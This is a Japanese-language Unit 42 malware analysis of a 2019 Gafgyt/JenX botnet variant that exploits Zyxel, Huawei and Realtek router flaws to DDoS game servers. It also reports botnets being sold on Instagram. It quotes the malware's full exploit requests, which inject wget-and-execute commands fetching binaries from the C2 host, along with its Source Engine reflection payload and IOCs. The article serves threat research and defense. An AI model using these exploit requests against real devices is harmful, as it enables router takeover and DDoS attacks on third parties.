[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/ "サイバー犯罪")  
  [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/)

# Gafgyt: 小規模オフィス/ホーム無線LANルーターに感染しゲームサーバーを攻撃するボットネット

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます  
Related Products  
[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/ja/product-category/advanced-threat-prevention-ja/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/ja/product-category/next-generation-firewall-ja/ "Next-Generation Firewall")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Asher Davila](https://unit42.paloaltonetworks.com/ja/author/asher-davila/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2019年11月5日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)
  * [脆弱性](https://unit42.paloaltonetworks.com/ja/category/vulnerabilities-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Botnet](https://unit42.paloaltonetworks.com/ja/tag/botnet-ja/)
  * [DDoS](https://unit42.paloaltonetworks.com/ja/tag/ddos-ja/)
  * [Exploit kit](https://unit42.paloaltonetworks.com/ja/tag/exploit-kit-ja/)
  * [IoT](https://unit42.paloaltonetworks.com/ja/tag/iot-ja/)
  * [WiFi routers](https://unit42.paloaltonetworks.com/ja/tag/wifi-routers-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/?pdf=download&lg=ja&_wpnonce=dce0597cbf "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/?pdf=print&lg=ja&_wpnonce=dce0597cbf "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Gafgyt:%20小規模オフィス/ホーム無線LANルーターに感染しゲームサーバーを攻撃するボットネット&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fhome-small-office-wireless-routers-exploited-to-attack-gaming-servers%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fhome-small-office-wireless-routers-exploited-to-attack-gaming-servers%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fhome-small-office-wireless-routers-exploited-to-attack-gaming-servers%2F&title=Gafgyt:%20小規模オフィス/ホーム無線LANルーターに感染しゲームサーバーを攻撃するボットネット "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fhome-small-office-wireless-routers-exploited-to-attack-gaming-servers%2F&text=Gafgyt:%20小規模オフィス/ホーム無線LANルーターに感染しゲームサーバーを攻撃するボットネット "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fhome-small-office-wireless-routers-exploited-to-attack-gaming-servers%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Gafgyt:%20小規模オフィス/ホーム無線LANルーターに感染しゲームサーバーを攻撃するボットネット%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fhome-small-office-wireless-routers-exploited-to-attack-gaming-servers%2F "Share in Mastodon")

## 概要

2019年9月、パロアルトネットワークス脅威インテリジェンス調査チームUnit 42（旧Zingbox security research）は、日常的に実施しているプロアクティブなIoT脅威のハンティング中、IoTデバイスに感染しようとする新たなGafgytボットネットの亜種を発見しました。この亜種は、特にZyxel、Huawei、Realtekなどよく知られたメーカーの小規模オフィス/ホーム用無線LANルーターに感染しようとするもので、別のボットネット、[*JenX*](https://www.virustotal.com/gui/file/04463cd1a961f7cd1b77fe6c9e9f5e18b34633f303949a0bb07282dedcd8e9dc/details)と競合するものです。両者はともに、リモートコード実行エクスプロイトによりアクセス権限を取得し、ルーターをボットネットに組み入れてゲームサーバー（特にValveのSource Engineが稼働するサーバー）を攻撃し、サービス拒否（DoS）を引き起こします。

今回発見されたGafgyt亜種はこのほかにも、Instagramでの販売が多数確認された類似ボットネットとも競合しています。Shodanのスキャンによれば、Gafgytのエクスプロイトに対して潜在的に脆弱な無線ルーターは、日本も含め世界中で3万2,000台以上にのぼり、以下に示すとおりGafgytは*JenX*よりも悪用する脆弱性が1つ多いことがわかっています。

* [CVE-2017-18368](https://nvd.nist.gov/vuln/detail/CVE-2017-18368): ZYXEL P660HN-T1A (このGafgyt亜種で新しく追加された脆弱性)
* [CVE-2017-17215](https://nvd.nist.gov/vuln/detail/CVE-2017-17215): Huawei HG532 (*JenX*でも悪用されている脆弱性)
* [CVE-2014-8361](https://nvd.nist.gov/vuln/detail/CVE-2014-8361): Realtek RTL81XX Chipset (*JenX*でも悪用されている脆弱性)

#### 狙われるIoTデバイスは小規模オフィス/ホーム用無線LANルーター

2016年以降、あらゆる業種の組織に最も一般的に存在するIoTデバイスの1つとして無線LANルーターがIoTボットネットに狙われるようになりました。この結果、侵害を受けた企業の本番環境ネットワークやIPアドレスのレピュテーション（評判）が貶められていることが確認されています。また、典型的な辞書攻撃（ボットネットがtelnetなどのセキュリティ保護されていないサービスを介してデバイスにログインしようとする攻撃）に代えて、エクスプロイトを使用してIoTデバイスにアクセスするボットネットが登場してきています。たとえIoTデバイス管理者がセキュリティ保護されていないサービスを無効化し、強力なログインパスワードを適用していても、こうしたエクスプロイトが使用されれば、これらIoTデバイスを介してボットネットをより簡単に拡張できるようになります。

Gafgytは2014年に発見されたボットネットで、大規模DDoS（分散型サービス拒否）攻撃を開始できることから広く利用されるようになりました。それ以来、これは多くの亜種へと進化し、あらゆる業界のさまざまなデバイスを標的にしています。よく知られていることですが、ボットネットとゲームサーバーの間には強い関連性があります。すでに*JenX* という類似亜種に関するレポートが[Radware](https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/)から公開されていますが、この類似亜種は[CVE-2017-17215](https://nvd.nist.gov/vuln/detail/CVE-2017-17215)と[CVE-2014-8361](https://nvd.nist.gov/vuln/detail/CVE-2014-8361)を悪用します。これらの脆弱性はそれぞれHuawei HG532、Realtek RTL81*XX*という無線LANルーターに存在しています。

今回、私たち調査チームは、更新されたGafgytマルウェアの亜種（SHA256: 676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07）が、*JenX* に由来する亜種であることを発見しました。また、サンプルの分析結果から、Gafgytが標的とする無線LANルーターの数は、元となった*JenX*マルウェアより1つ多く、3種類存在することを突き止めました。

* Zyxel P660HN-T1A: Gafgytで追加されたモデル
* Huawei HG532 : *JenX*と同じ標的モデル
* Realtek RTL81*XX* : *JenX*と同じ標的モデル

Gafgytは3つの「スキャナ」を使い、上記3つのルーターに存在する既知のリモートコード実行脆弱性をエクスプロイトしようとします。これらスキャナは、他のIoTボットネットでよく見られる典型的な辞書攻撃に代わるものです。
[![図1 サンプルで見つかったスキャナ用関数](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png) 図1 サンプルで見つかったスキャナ用関数

以前のGafgyt亜種でも無線LANルーターの脆弱性が悪用されていましたが、今回の亜種は次の3つの特定エクスプロイトを1つのサンプル内に併せ持っています。

* [CVE-2017-18368](https://nvd.nist.gov/vuln/detail/CVE-2017-18368): ZYXEL P660HN-T1A
* [CVE-2017-17215](https://nvd.nist.gov/vuln/detail/CVE-2017-17215): Huawei HG532
* [CVE-2014-8361](https://nvd.nist.gov/vuln/detail/CVE-2014-8361): Realtek RTL81XX Chipset

これらエクスプロイトは、感染対象デバイスの種類に応じ、悪意のあるサーバーから対応するバイナリを取得するバイナリドロッパーとして機能するよう、作成されています。

#### **エクスプロイト1: CVE-2017-18368 (ZYXEL P660HN-T1A用)**

最初のエクスプロイトは、Zyxel P660HN無線LANルーターに存在するリモートコマンドインジェクションの脆弱性を悪用します。このエクスプロイトは、前身となった亜種*JenX* では使用されていなかったものです。TrueOnlineが提供するZyxel P660HN-T1Aには、リモートシステムのログ転送を行う関数にコマンドインジェクションの脆弱性が存在し、認証されていないユーザーによるアクセスを許します。この脆弱性はViewLog.aspページに存在し、次に示したようにremote\_hostパラメーターを介して悪用される可能性があります。  
POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 127.0.0.1Connection: keep-alive Accept-Encoding: gzip, deflate Accept: \*/\* User-Agent: Ankit Content-Length: 176 Content-Type: application/x-www-form-urlencoded remote\_submit\_Flag=1\&remote\_syslog\_Flag=1\&RemoteSyslogSupported=1\&LogFlag=0\&remote\_hos t=%3bcd+/tmp;wget+http://185.172.110\[.\]224/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23\&remoteSubmit=Save

|----------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 | POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 127.0.0.1Connection: keep-alive Accept-Encoding: gzip, deflate Accept: \*/\* User-Agent: Ankit Content-Length: 176 Content-Type: application/x-www-form-urlencoded remote\_submit\_Flag=1\&remote\_syslog\_Flag=1\&RemoteSyslogSupported=1\&LogFlag=0\&remote\_hos t=%3bcd+/tmp;wget+http://185.172.110\[.\]224/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23\&remoteSubmit=Save |

ペイロードはzyxelscanner\_scanner\_init()関数内に存在します。
[![図2 zyxelscanner\_scanner\_init()内で見つかったZyxel用エクスプロイト](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png) 図2 zyxelscanner\_scanner\_init()内で見つかったZyxel用エクスプロイト

#### **エクスプロイト2: CVE-2017-17215 (Huawei HG532用)**

2番目のエクスプロイトは、Huawei HG532ルーターで見つかったリモートコード実行の脆弱性を悪用します。攻撃者は、悪意のあるパケットを37215/tcpに送信することで攻撃を開始可能です。エクスプロイトに成功すると、任意のコードがリモートから実行される可能性があります。  
POST /ctrlt/DeviceUpgrade\_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: \*/\* Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade\_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" \<!--?xml version="1.0" encoding="UTF-8"?--\>\<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"\>\<s:Body\>\<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"\>\<NewStatusURL\>$(/bin/busybox wget -g 185.172.110\[.\]224 -l /tmp/mips -r /mips; /bin/busybox chmod 777 \* /tmp/mips; /tmp/mips huawei)\</NewStatusURL\>\<NewDownloadURL\>$(echo HUAWEIUPNP)\</NewDownloadURL\>\</u:Upgrade\>\</s:Body\>\</s:Envelope\>

|----------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 | POST /ctrlt/DeviceUpgrade\_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: \*/\* Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade\_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" \<!--?xml version="1.0" encoding="UTF-8"?--\>\<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"\>\<s:Body\>\<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"\>\<NewStatusURL\>$(/bin/busybox wget -g 185.172.110\[.\]224 -l /tmp/mips -r /mips; /bin/busybox chmod 777 \* /tmp/mips; /tmp/mips huawei)\</NewStatusURL\>\<NewDownloadURL\>$(echo HUAWEIUPNP)\</NewDownloadURL\>\</u:Upgrade\>\</s:Body\>\</s:Envelope\> |

エクスプロイトはhuaweiscanner\_scanner\_init()関数から確認できます。
[![図3 huaweiscanner\_scanner\_init()内で見つかったHuawei用エクスプロイト](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png) 図3 huaweiscanner\_scanner\_init()内で見つかったHuawei用エクスプロイト

#### **エクスプロイト3: CVE-2014-8361 (Realtek RTL81XX Chipset用)**

3番目のエクスプロイトは2014年にRealtekルーターの一部について報告された深刻な欠陥を突くもので、これによりリモートからコードが実行される可能性があります。原因はRealtek SDKが実装したminiigd SOAPサービスにあります。エクスプロイトに成功すると、巧妙に細工された*NewInternalClient*リクエストを介して、リモートの攻撃者に任意のコードを実行される可能性があります。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/word-image-42.png)

この3番目のエクスプロイトは、 realtekscanner\_scanner\_init()関数内で見つかります。
[![図4 realtekscanner\_scanner\_init()で発見されたRealtek用エクスプロイト](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png) 図4 realtekscanner\_scanner\_init()で発見されたRealtek用エクスプロイト

#### 感染

この*JenX*亜種は、前述のスキャナ関数を使用して感染対象マシンを見つけ、wget（Webサーバーからコンテンツを取得するコンピュータプログラム）を使い、見つけたマシンの種類に応じてARM7ないしMIPSのバイナリをダウンロードします。

[![図5 バイナリのドロップに使われる185.172.110\[.\]224/mipsと185.172.110\[.\]224/arm7](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png) 図5 バイナリのドロップに使われる185.172.110\[.\]224/mipsと185.172.110\[.\]224/arm7 侵害デバイス上で実行開始したマルウェアは、バイナリのドロッパーサーバーでもあるC2サーバーに接続してデバイス情報を送信し、ボットネットに参加します。

[![図6 185.172.110\[.\]224で稼働するC2サーバーに993/tcpで接続](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png) 図6 185.172.110\[.\]224で稼働するC2サーバーに993/tcpで接続 このとき感染デバイスは、IPアドレスやアーキテクチャなど自身に関する情報をC2サーバーに送信します。引数としてマルウェアに名前が渡されなかった場合、感染デバイスには*Unknown* という名前が付けられます。この後C2サーバーは *PING* コマンド*で応答します。*

[![図7 ボットネットに参加するデバイスに名前を割り当てる](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png) 図7 ボットネットに参加するデバイスに名前を割り当てる [![図7 C2からの応答](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-7.-C2-response.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-7.-C2-response.png) 図7 C2からの応答

デバイスがボットネットに参加すると、さまざまな種類のDoS攻撃を実行するコマンドの受信を開始します。これらのコマンドについて次節以降で説明します。

#### DoS攻撃オプション

このGafgyt亜種は、C2サーバーから受信したコマンドに応じ、さまざまなDoS攻撃を同時に実行できます。マルウェアのmain()関数は別の関数processCmd()を呼び出してコマンドを処理し、対応する攻撃を開始します。以下は、特定された重要な攻撃オプションの一部です。

* HTTP: SendHTTP()関数を呼び出してHTTPフラッド攻撃を開始します。この関数は、攻撃実行用に6つのパラメーター（httpメソッド、ターゲットホスト、ポート、ファイルパス、終了時間、繰り返し回数）を受け取ります。このほか、プログラムで定義されたUser-Agentの1つをランダムに使用して攻撃を実行します。
* HTTPHex: HTTPに類似した攻撃オプションで、SendHTTPHex()関数を呼び出します。SendHTTPHex()関数はSendHTTP()関数と同じパラメータを要求しますが、通常のファイルパス（/index.htmlなど）の代わりにゴミデータの入った16進数配列を使用してサーバー上のリソースを消費し、枯渇させようとします。
* HTTPCF: Cloudflareが保護するサービスに対する攻撃を行います。
* KILLER \& KILLATTK: 仮に感染デバイス上にすでに競合のボットネットが存在していればそれを削除します。
* VSE: ValveのSource Engineが稼働するゲームサーバーを攻撃するペイロードを含みます。

[![図8 今回のGafgyt亜種で最も注目すべきコマンド](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-9.-Decoded-TSource-Engine-Query-payload.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-9.-Decoded-TSource-Engine-Query-payload.png) 図8 今回のGafgyt亜種で最も注目すべきコマンド

#### 依然狙われるゲーム業界

前述のように、 *VSE* コマンドは、ValveのSource Engineを採用するゲームサーバーに対する攻撃を開始するものです。Source Engineをエンジンとして使うゲームには、*Half-Life* や*Team Fortress 2*があげられます。なお、これはValve Corporation自体に対する攻撃ではない点に注意してください。自前のネットワークにSource Engineを採用したゲームサーバーを立てることは誰にでもできますし、ここで説明する攻撃オプションは、これらのサーバーに対する攻撃のためのものです。以下は、Source Engineを使うゲームサーバーの攻撃用に使用されるペイロードです。  
TSource Engine Query + /x54/x53/x6f/x75/x72/x63/x65/x20/x45/x6e/x67/x69/x6e/x65/x20/x51/ x75/x65/x72/x79 rfdknjms

|-------|-------------------------------------------------------------------------------------------------------------------|
| 1 2 3 | TSource Engine Query + /x54/x53/x6f/x75/x72/x63/x65/x20/x45/x6e/x67/x69/x6e/x65/x20/x51/ x75/x65/x72/x79 rfdknjms |

ペイロードは次の内容にデコードされます。
[![図9 デコードされたTSource Engine Queryのペイロード](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png) 図9 デコードされたTSource Engine Queryのペイロード

このペイロードはDoSリフレクション攻撃（DRDoS）を引き起こすためによく利用されるもので、DRDoS攻撃では、複数の感染マシンを意図せずDDoS攻撃に参加させます。*Source Engine Query*というのは、Valveソフトウェアプロトコルを使用するクライアント/ゲームサーバー間でやり取りされる定期的通信の1つです。感染ホストマシンへのリクエストは、感染ホストからターゲットホストにリダイレクト（リフレクト）され、この結果、攻撃トラフィック量が増幅され、ターゲットホストに対するサービス拒否攻撃が発生します。

このほか、VSE以外のDoS攻撃オプションを使用し、攻撃者は他にもFortniteなど広くプレイされているゲームをホスティングしているサーバーも標的にしています。

#### SNSがマルウェアのマーケットプレイスに

このサンプルで見つかった攻撃の1つに、同一デバイスに存在する競合ボットネットを探してkillしようとするものがあります。これにより、Gafgytを感染デバイスが参加する唯一のボットネットにしようとしています。このためにGafgytは他のIoTボットネット亜種に存在する特定のキーワードやバイナリ名を探します。これらのキーワードとバイナリは***bin\_names*** 、***bin\_strings***という2つの組に分けられています。
[![図10 他のIoTボットネットに存在するバイナリ名や部分文字列](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png) 図10 他のIoTボットネットに存在するバイナリ名や部分文字列

識別できたなかで興味深かった文字列が*chinese family*です。この文字列は、Gafgytマルウェアの前身となった*JenX* に関連しています。JenXは、Grand Theft Auto: San Andreasというゲームのホスティングサーバーを標的にするSan Calvicieというハッカーグループが拡散していたボットネットですが、この*JenX*が

*gosh that **chinese family** at the other table sure ate a lot.*

という文字列を出力するのです。

これら文字列の多くは、Hakai、Miori、Satori、悪名高いMiraiなど、他のIoTボットネットに関連したものでした。このほかには、Instagramでのユーザー名に対応するボットネットのビルドに関連する文字列も見られました。

調査チームが偽のプロフィールで作ったアカウントでこれらInstagramユーザーに連絡した結果、彼らがInstagramのアカウントを使って安価にボットネットを販売していることがわかりました。彼らは私たちに「8ドルから150ドルでサーバー上の『スポット』を提供できる」という話を持ちかけてきました。この「スポット」というのは「対価を払えば、稼働中のボットネットでDoS攻撃をかけるIPアドレスの対象に、任意のIPアドレスのセットを追加してもらえる」ということを意味しています。他にも彼らは「予算とニーズ次第で、さまざまな価格でボットネットのソースコードを提供できる」という話も持ちかけてきました。

※ Unit 42はInstagramチームにこれら悪意のあるユーザーアカウントについて報告済みです。ボットネットのサブスクリプション管理用に使用されている悪意のあるWebサイトについても報告済みです。
[![図11 ボットネットを販売しているInstagramアカウント](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-11.-Instagram-accounts-selling-botnets.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-11.-Instagram-accounts-selling-botnets.png) 図11 ボットネットを販売しているInstagramアカウント [![図12 Fortniteへの攻撃ボットネットを販売するInstagramアカウント](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png) 図12 Fortniteへの攻撃ボットネットを販売するInstagramアカウント [![図13 悪意のあるInstragramユーザーのストーリー](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-13.-Instagram-story-of-a-malicious-user.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-13.-Instagram-story-of-a-malicious-user.png) 図13 悪意のあるInstragramユーザーのストーリー

一部のユーザーは、ボットネットのサブスクリプション管理のために独自のWebサイトを持っています。
[![図14 ウェブサイトのログイン画面](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-14.-Login-to-the-website-1024x354.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-14.-Login-to-the-website-1024x354.png) 図14 ウェブサイトのログイン画面 [![図15 ボットネット購入用のダッシュボード](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-15.-Dashboard-to-hire-botnets-1024x733.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-15.-Dashboard-to-hire-botnets-1024x733.png) 図15 ボットネット購入用のダッシュボード [![図16 VIPスポットと呼ばれる一番高い価格](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png)](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/10/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png) 図16 VIPスポットと呼ばれる一番高価なサービス

## 結論

私たち調査チームが発見した新たなボットネットであるGafgytは、JenXの亜種から派生したもので、IoTデバイスの既知の脆弱性（5年以上前のものを含む）を突くエクスプロイトを使い、侵害したIoTデバイスを大規模なボットネットの一部に組み込んで、ゲームサーバーを狙った攻撃を行います。その攻撃の主な目的はサボタージュや復讐です。

無線LANルーターはどの業種でも広く使用されていることから、こうした攻撃にとくに狙われやすいものとなっています。

お客様の環境を保護するため、弊社でもこうした新しいマルウェアの探索を常に行っています。IoTボットネットが攻撃対象とするホストの種類はこれまでと比べて広がっており、ゲームサーバーもそうした攻撃の標的になりやすいホストの1つです。

同様に、これまでマルウェア用マーケットプレイスといえばダークウェブや地下フォーラムのようなアンダーグラウンド系のものが多かったのですが、現在はSNS上での販売が行われるようになっています。マルウェアのサンプルやDoS攻撃用のコードは誰もが簡単に入手でき、たいした技術力がなくとも数ドルで大規模な攻撃を仕掛けることができます。

要するに、Instagramで販売されているIoTボットネットの増加、コストの低下、RCE（リモートコード実行）エクスプロイトの存在、すべての業種で普遍的に利用されている無線LANルーター、これらの要素がすべて合わさって、IoTデバイスがボットネットに組み込まれるリスクはいよいよ高まってきているということです。

これら諸要素は、すべての業界がIoTセキュリティを意識し、ネットワークデバイスへの侵害を防ぎ、ビジネスの継続性を保つ対策を講じる必要性を浮き彫りにしていると言えるでしょう。

## IOC

#### **前身となったJenXのサンプル:**

* **MD5:** fb93601f8d4e0228276edff1c6fe635d
* **SHA256:** 04463cd1a961f7cd1b77fe6c9e9f5e18b34633f303949a0bb07282dedcd8e9dc

#### **更新されたJenXのサンプル:**

* **MD5:** f1c099d65bf94e009f5e65238caac468
* **SHA256:** 676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07

#### **インフラ:**

* 185\.172.110\[.\]224:993

#### **URL:**

* 185\.172.110\[.\]224/arm7
* 185\.172.110\[.\]224/mips

#### **このサンプルでHTTP攻撃に使われていたUser-Agent:**

* Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
* Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko)  
